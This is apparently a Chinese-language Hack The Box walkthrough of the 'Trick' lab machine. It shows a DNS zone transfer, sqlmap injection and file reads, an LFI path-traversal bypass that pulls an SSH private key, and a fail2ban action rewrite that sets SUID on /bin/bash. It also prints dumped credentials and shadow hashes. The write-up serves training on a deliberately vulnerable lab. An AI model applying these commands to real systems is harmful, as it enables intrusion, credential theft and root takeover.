基本信息

https://www.hackthebox.com/home/machines/profile/477
10.10.11.166

端口扫描

22，25，53，80:

$ nmap -sC -sV 10.10.11.166
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 13:21 CST
Nmap scan report for 10.10.11.166
Host is up (0.20s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.12 seconds

80

直接访问是Coming Soon：

53 dns域传送

dns域传送获得几个域名：

$ dig @10.10.11.166 axfr trick.htb

; <<>> DiG 9.10.6 <<>> @10.10.11.166 axfr trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 688 msec
;; SERVER: 10.10.11.166#53(10.10.11.166)
;; WHEN: Wed Jun 29 13:29:18 CST 2022
;; XFR size: 6 records (messages 1, bytes 203)

##preprod-payroll.trick.htb

加hosts后访问

1	10.10.11.166 preprod-payroll.trick.htb trick.htb

preprod-payroll

很容易发现sql注入：

sql注入

直接sqlmap,但得到的密码并不能登录：

sqlmap -u "http://preprod-payroll.trick.htb/ajax.php?action=login" --data "username=admin&password=aaa" -v 3 --level 3

available databases [2]:
[*] information_schema
[*] payroll_db

Database: payroll_db
[11 tables]
+---------------------+
| position            |
| allowances          |
| attendance          |
| deductions          |
| department          |
| employee            |
| employee_allowances |
| employee_deductions |
| payroll             |
| payroll_items       |
| users               |
+---------------------+

Table: users
[1 entry]
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
| id | doctor_id | name          | type | address | contact | password              | username   |
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
| 1  | 0         | Administrator | 1    | <blank> | <blank> | SuperGucciRainbowCake | Enemigosss |
+----+-----------+---------------+------+---------+---------+-----------------------+------------+

SuperGucciRainbowCake

文件读取

测试发现可以通过sql去读取文件：

sqlmap -u "http://preprod-payroll.trick.htb/ajax.php?action=login" --data "username=admin&password=aaa" -v 3 --level 3 --file-read "/etc/passwd"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:112:121::/var/lib/saned:/usr/sbin/nologin
colord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:118:65534::/run/sshd:/usr/sbin/nologin
postfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin
bind:x:120:128::/var/cache/bind:/usr/sbin/nologin
michael:x:1001:1001::/home/michael:/bin/bash

vhost

根据得到的子域名命名规则生成字典，得到其他的vhost：

sed 's/^/preprod-/' ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt > subdomains.txt

gobuster vhost -u http://trick.htb -w subdomains.txt -t 50

Found: preprod-marketing.trick.htb (Status: 200) [Size: 9660]

preprod-marketing

加入hosts后访问：

LFI

根据page参数很容易猜到LFI，存在简单的过滤，可以双写绕过：

(过滤规则也可以通过前面sql的文件读取读源码获得)

1	preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././..././..././etc/passwd

michael_id_rsa

这里有权限读取michael用户的私钥(前面的sql那里没权限读的)：

1	curl "http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././..././..././home/michael/.ssh/id_rsa" > michael_id_rsa

内容：

user flag

使用得到的私钥登录michael：

提权信息

很明显的提示，fail2ban：

fail2ban被触发时会执行配置文件中预先定义的命令，所以大概就是修改配置文件自定义命令后重启服务，然后去触发fail2ban执行命令

Privilege Escalation via fail2ban – Research Blog
https://grumpygeekwrites.wordpress.com/2021/01/29/privilege-escalation-via-fail2ban/

查看配置目录也可以发现，虽然当前用户不能直接修改配置文件，但当前用户在security组中，对目录有操作权限，可以删除原有配置文件后创建新的配置文件：

fail2ban to root

修改配置文件后重启服务，然后去触发fail2ban执行命令：

michael@trick:/tmp$ sed "s/<iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>/chmod u+s \/bin\/bash/g" /etc/fail2ban/action.d/iptables-multiport.conf > config.conf
michael@trick:/tmp$ rm -f /etc/fail2ban/action.d/iptables-multiport.conf
michael@trick:/tmp$ mv config.conf /etc/fail2ban/action.d/iptables-multiport.conf
michael@trick:/tmp$ sudo /etc/init.d/fail2ban restart

# 爆破，触发fail2ban
hydra 10.10.11.166 ssh -l root -P /usr/share/wordlists/rockyou.txt

shadow

1
2

root:$6$lbBzS2rUUVRa6Erd$u2u317eVZBZgdCrT2HViYv.69vxazyKjAuVETHTpTpD42H0RDPQIbsCHwPdKqBQphI/FOmpEt3lgD9QBsu6nU1:19104:0:99999:7:::
michael:$6$SPev7eFL5z0aKFf0$5iLTl9egsGGePEPUnNJlFyw8HHvTwqVC3/THKzW2YD5ZPnbkN7pSOeOkXe9uiUHfOJegJdYT0j3Z9pz.FSX2y0:19104:0:99999:7:::

root_id_rsa

参考资料

Privilege Escalation via fail2ban – Research Blog
https://grumpygeekwrites.wordpress.com/2021/01/29/privilege-escalation-via-fail2ban/
Trick HTB Discussion | BreachForums
https://breached.to/Thread-Trick-HTB-Discussion--10712
Writeup Trick HackTheBox
https://gatogamer1155.github.io/hackthebox/trick/

Trick - HackTheBox

2022-06-29